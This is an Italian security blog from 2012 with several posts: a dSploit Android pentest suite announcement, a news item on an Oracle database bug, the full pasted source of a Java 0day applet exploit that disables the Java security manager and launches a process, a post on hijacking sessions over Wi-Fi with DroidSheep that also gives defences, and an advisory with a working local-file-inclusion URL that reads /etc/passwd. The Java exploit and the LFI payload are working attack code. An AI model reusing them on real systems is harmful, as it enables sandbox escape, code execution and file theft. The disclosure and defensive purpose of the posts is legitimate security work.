giovedì 27 settembre 2012

DSPLOIT - AN ANDROID NETWORK PENETRATION SUITE



Nasce dsploit un'applicazione android per il security assesments e penetration test.

COSA È DSPLOIT ?



dSploit è una suite per Android per l'analisi e la penetrazione di rete, che mira ad offrire ai professionisti ed i geek della IT Security lo strumento professionale più avanzato e completo per eseguire security assesments di rete su un dispositivo mobile. Una volta avviata l'applicazione, l'utente sarà in grado di mappare la propria rete, identificare i sistemi operativi ed i servizi in esecuzione sugli altri endpoint, cercare le relative vulnerabilità note, craccare procedure di login dei più comuni sistemi di autenticazione, eseguire attacchi di tipo man in the middle e conseguentemente avere il totale controllo del traffico di rete, sia passivo con un password sniffer e dei dissector dei protocolli più comuni, che attivo manipolando in tempo reale i pacchetti da e verso le altre macchine connesse sulla nostra stessa rete, ecc ecc.

REQUISITI



I requisiti per poter installare ed utilizzare dSploit sono :

  • Un dispositivo Android con almeno la versione 3.0 del sistema operativo.
  • Il dispositivo deve essere necessariamente rootato.
  • Una full install di busybox ( quindi con tutti i binari installati, non quella parziale ).


Read more: http://www.evilsocket.net/dsploit-an-android-network-penetration-suite.html#ixzz27eoZUC48


E' possibile scaricare l'applicazione utilizzando il QR Code di seguito:


sabato 22 settembre 2012

Oracle 1 ne fa e 100 ne combina

Dopo il bug su java, la pezza con relativo bug rilasciato successivamente, adesso è tempo del DBMS targato Oracle, infatti sarebbe stato scoperto un bug che permetterebbe ad un attacker di scovare le credenziali da amministratore del database.
Maggiori informazioni qui: http://punto-informatico.it/3610612/PI/News/oracle-spifferi-nei-database.aspx

mercoledì 29 agosto 2012

Java 0Day Exploit Migliaia di computer a rischio

E' di questi giorni la notizia di un nuovo bug presente su Java runtime, JRE 1.7 che permetterebbe l'esecuzione di codice arbitrario sulla macchina vittima, il bug è stato classificato ad alto rischio in quanto colpirebbe qualsiasi OS e Browser, molti malware writer sono già all'opera per creare virus e worm che sfrutterebbero questa falla, ma la cosa più eclatante sta nel fatto che Oracle non rilascerà nessuna patch se non prima di Ottobre.
L'exploit è già presente su Metasploit quindi potete testare la vulnerabilità del proprio browser.


Al momento non ci sono soluzioni tranne quella di disabilitare java sul proprio browser, per chi è interessato a capire la vulnerabilità e studiarla di seguito incollo il source originale dell'exploit 0Day.

//
// CVE-2012-XXXX Java 0day
//
// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
// 
// secret host / ip : ok.aa24.net / 59.120.154.62
//
// regurgitated by jduck
//
// probably a metasploit module soon...
//
package cve2012xxxx;

import java.applet.Applet;
import java.awt.Graphics;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.URL;
import java.security.*;
import java.security.cert.Certificate;

public class Gondvv extends Applet
{

    public Gondvv()
    {
    }

    public void disableSecurity()
        throws Throwable
    {
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
        Permissions localPermissions = new Permissions();
        localPermissions.add(new AllPermission());
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
            localProtectionDomain
        });
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
        localStatement.execute();
    }

    private Class GetClass(String paramString)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[1];
        arrayOfObject[0] = paramString;
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
        localExpression.execute();
        return (Class)localExpression.getValue();
    }

    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
        throws Throwable
    {
        Object arrayOfObject[] = new Object[2];
        arrayOfObject[0] = paramClass;
        arrayOfObject[1] = paramString;
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
        localExpression.execute();
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
    }

    public void init()
    {
        try
        {
            disableSecurity();
            Process localProcess = null;
            localProcess = Runtime.getRuntime().exec("calc.exe");
            if(localProcess != null);
               localProcess.waitFor();
        }
        catch(Throwable localThrowable)
        {
            localThrowable.printStackTrace();
        }
    }

    public void paint(Graphics paramGraphics)
    {
        paramGraphics.drawString("Loading", 50, 25);
    }

domenica 26 agosto 2012

Mitm da Smartphone ! Difendiamo le nostre password



Molti di noi viaggiano, e tanti utilizzano gli hotspot gratuiti o le connessioni wifi messe a disposizione dagli alberghi, ma non tutti sanno che con l'avvento degli Smartphone e delle numerosissime App, sono  nati molti malware e App da Pentest che messe nelle mani sbagliate possono diventare delle vere e proprie armi.
Ho deciso di scrivere questo articolo per mettervi in guardia su un tipo di attacco chiamato MITM(man in the middle) in italiano tradotto attacco dell'uomo di mezzo.
Non voglio entrare nello specifico, per saperne di più vi rimando a wikipedia.

Ho effettuato dei test all'interno della mia rete wifi per farvi toccare con mano la pericolosità di questo tipo di attacco.

Ho utilizzato uno Smartphone Android e l'app Droidsheep, una volta installata l'app non necessita di nessuna configurazione, la semplicità di utilizzo la rende molto pericolosa perchè non sono necessarie skill particolari, mentre prima per portare questo tipo di attacco bisognava essere dei veri e propri Geek.

Una volta lanciata l'app basta cliccare su Start, iniziando così lo sniffing una volta che l'applicazione intercetta la sessione di un utente la visualizza sullo schermo, dopo non ci resta che cliccare sopra la sessione catturata per far aprire il browser dello smartphone, accedendo con le credenziali della vittima.

Di seguito lo screenshot eseguito all'interno della mia rete, sniffando la mia sessione facebook:



Difendiamoci dal MITM.

Per poterci difende da questo tipo di attacco dobbiamo usare connessioni sicure in SSL, dovremmo quindi utilizzare Facebook impostando la connessione sicura che trovate nelle impostazioni del vostro account.
Ma questo non è il rimedio a tutti i mali, non tutti i siti web utilizzano connessioni protette (è possibile sniffare anche le connessioni protette utilizzando un certificato fake), la soluzione è utilizzare una VPN(Virtual Private Network) che crea una connessione cryptata con certificato privato proteggendo la vostra connessione da qualsiasi tipo di attacco, è possibile impostarla sia sul vostro computer che sullo Smartphone, in rete se ne trovano anche di Gratuite ma il top rimangono quelle a pagamento i prezzi vanno da 5€ al mese a 10-11€ al mese in base alle esigenze.
Per capire il funzionamento delle VPN vi rimando a Wikipedia.

Tra le Vpn gratuite vi consiglio di provare https://www.vpnreactor.com/default.aspx

Spero di esservi stato d'aiuto, ricordate che la rete è una Jungla e bisogna imparare a difendersi.

giovedì 23 agosto 2012

Ad Manager Pro v. 4 Remote FLI


-=[--------------------ADVISORY-------------------]=-

              Ad Manager Pro v. 4
Author: Corrado Liotta Aka CorryL [corryl80@gmail.com]

-=[-----------------------------------------------]=-


-=[+] Application: Ad Manager Pro
-=[+] Version: 4
-=[+] Vendor's URL: http://www.phpwebscripts.com/ad-manager-pro/
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: LFI
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611
-=[+] WebSite: http://corryl80.blogspot.com/

...::[ Descriprion ]::..

Ad Manager Pro is the most complete ad management solution available. You can use it to manage ads on your site(s), you also can sell clicks, impressions and/or days range to advertisers and purchase clicks and/or impressions from publishers. Features of this quality system may bring you an interesting income.
You and your users have a real-time statistic for each ad (hourly, daily, monthly statistic), also a graphical statistic is available. Advertisers and publishers can order daily email reports. Each ad may be used in multiple campaigns, each campaign has its own statistic and configuration.
Support for classic banners (gif, jpg, png, swf), plain text/html ads, ads from templates (Google AdWords style). You can display ads on pages or in popup consoles. There are many ways to show ads on pages - javascript, iframe, php include command. It lets you place the ads to any webpage.
Option to load a new ad after a given number of seconds. Ads can be targeted by countries,days,hours.


...::[ Bug ]::..

Local File Inclusion (also known as LFI) is the process of including files on a server through the web browser.
This vulnerability occurs when a page include is not properly sanitized, and allows directory traversal characters to be injected.


...::[ Proof Of Concept ]::..

http://remote-server/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

..::[ Disclousure Timeline ]::..

[23/08/2012] - Public Disclousure